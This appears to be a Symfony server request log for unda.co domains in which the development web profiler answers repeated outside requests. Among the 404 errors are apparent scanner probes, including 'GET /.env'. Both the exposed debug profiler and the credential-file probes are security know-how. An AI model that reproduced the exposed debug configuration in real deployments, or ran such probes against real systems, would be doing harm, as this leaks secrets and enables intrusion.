[2025-12-19 04:47:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ac55c9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ac55c9?panel=cache","method":"GET"} []
[2025-12-19 04:47:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 04:53:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=twig","method":"GET"} []
[2025-12-19 04:53:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 04:57:21] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-19 05:02:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=security","method":"GET"} []
[2025-12-19 05:02:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 05:04:33] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 05:06:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 05:11:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=request","method":"GET"} []
[2025-12-19 05:11:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 05:12:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"92f21a","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/92f21a?panel=time","method":"GET"} []
[2025-12-19 05:12:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 05:15:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ad52ae","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ad52ae?group=1&panel=db","method":"GET"} []
[2025-12-19 05:15:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-19 05:15:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f7acf9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f7acf9?panel=time","method":"GET"} []
[2025-12-19 05:15:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 05:18:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 05:22:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=twig","method":"GET"} []
[2025-12-19 05:22:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 05:24:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9fab17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9fab17?panel=events","method":"GET"} []
[2025-12-19 05:24:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-19 05:24:43] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"092da8","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/092da8/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-19 05:24:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-19 05:25:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b30c5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b30c5e","method":"GET"} []
[2025-12-19 05:25:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 05:27:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7bd27a","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/7bd27a?panel=router","method":"GET"} []
[2025-12-19 05:27:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-19 05:29:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4c9de0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4c9de0","method":"GET"} []
[2025-12-19 05:29:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 05:32:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"322ef6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/322ef6?panel=form","method":"GET"} []
[2025-12-19 05:32:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-19 05:33:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"82bc72","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/82bc72?panel=swiftmailer","method":"GET"} []
[2025-12-19 05:33:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-19 05:34:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=time","method":"GET"} []
[2025-12-19 05:34:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 05:46:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=cache","method":"GET"} []
[2025-12-19 05:46:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 05:46:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=events","method":"GET"} []
[2025-12-19 05:46:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-19 05:52:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 05:55:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 05:58:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36","method":"GET"} []
[2025-12-19 05:58:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 06:01:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b6a418","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b6a418","method":"GET"} []
[2025-12-19 06:01:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 06:05:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 06:10:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=config","method":"GET"} []
[2025-12-19 06:10:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 06:11:28] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-19 06:11:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-19 06:11:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=exception","method":"GET"} []
[2025-12-19 06:11:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-19 06:16:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"88c253","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/88c253?panel=security","method":"GET"} []
[2025-12-19 06:16:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 06:17:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"13e8f6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/13e8f6?panel=exception","method":"GET"} []
[2025-12-19 06:17:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-19 06:22:43] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-19 06:22:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-19 06:23:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=time","method":"GET"} []
[2025-12-19 06:23:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 06:27:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 06:32:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 06:34:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=request","method":"GET"} []
[2025-12-19 06:34:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 06:42:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3259f5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3259f5?panel=swiftmailer","method":"GET"} []
[2025-12-19 06:42:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-19 06:46:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c","method":"GET"} []
[2025-12-19 06:46:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 06:46:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=66.249.69.166&limit=10&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
[2025-12-19 06:46:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.69.166&limit=10&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
[2025-12-19 06:46:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4cfca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4cfca9?panel=time","method":"GET"} []
[2025-12-19 06:46:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 06:49:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 06:57:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=twig","method":"GET"} []
[2025-12-19 06:57:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 06:58:37] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 07:01:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 07:01:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-19 07:07:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"674ce7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/674ce7?panel=router","method":"GET"} []
[2025-12-19 07:07:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-19 07:09:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=5.181.190.248&limit=10&method=GET","method":"GET"} []
[2025-12-19 07:09:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=5.181.190.248&limit=10&method=GET","method":"GET"} []
[2025-12-19 07:11:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=time","method":"GET"} []
[2025-12-19 07:11:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 07:22:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=security","method":"GET"} []
[2025-12-19 07:22:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 07:23:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 07:23:57] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 07:24:16] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"4e9618","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/4e9618","method":"GET"} []
[2025-12-19 07:24:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 07:24:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 07:29:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"HEAD"} []
[2025-12-19 07:31:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4210bf","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4210bf?panel=config","method":"GET"} []
[2025-12-19 07:31:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 07:32:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4593c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b4593c?panel=twig","method":"GET"} []
[2025-12-19 07:32:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 07:32:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=twig","method":"GET"} []
[2025-12-19 07:32:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 07:33:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=request","method":"GET"} []
[2025-12-19 07:33:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 07:33:52] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-19 07:38:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c4e99c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c4e99c","method":"GET"} []
[2025-12-19 07:38:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 07:39:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0): at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
